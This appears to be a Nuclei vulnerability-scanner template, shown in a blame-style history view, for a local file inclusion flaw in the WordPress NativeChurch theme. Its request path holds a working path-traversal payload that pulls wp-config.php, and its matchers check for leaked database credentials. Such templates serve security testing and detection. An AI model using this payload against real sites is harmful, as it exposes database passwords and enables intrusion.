2021-07-15 09:41:08 +00:00
|
|
|
id: nativechurch-wp-theme-lfd
|
|
|
|
|
|
|
|
info:
|
2022-07-29 14:04:23 +00:00
|
|
|
name: WordPress NativeChurch Theme - Local File Inclusion
|
2021-07-15 09:41:08 +00:00
|
|
|
author: 0x_Akoko
|
|
|
|
severity: high
|
2022-08-10 09:06:49 +00:00
|
|
|
description: |
|
|
|
|
WordPress NativeChurch Theme is vulnerable to local file inclusion in the download.php file.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html
|
2022-08-06 16:54:58 +00:00
|
|
|
- https://wpscan.com/vulnerability/2e1062ed-0c48-473f-aab2-20ac9d4c72b1
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: wp-theme,lfi,wp,packetstorm,wpscan,wordpress
|
2021-07-15 09:41:08 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php'
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2022-08-10 09:06:49 +00:00
|
|
|
part: body
|
2021-07-15 09:41:08 +00:00
|
|
|
words:
|
|
|
|
- "DB_NAME"
|
|
|
|
- "DB_PASSWORD"
|
2021-07-15 12:13:45 +00:00
|
|
|
- "DB_HOST"
|
|
|
|
- "The base configurations of the WordPress"
|
2021-07-15 09:41:08 +00:00
|
|
|
condition: and
|
2022-07-29 14:04:23 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/07/29
|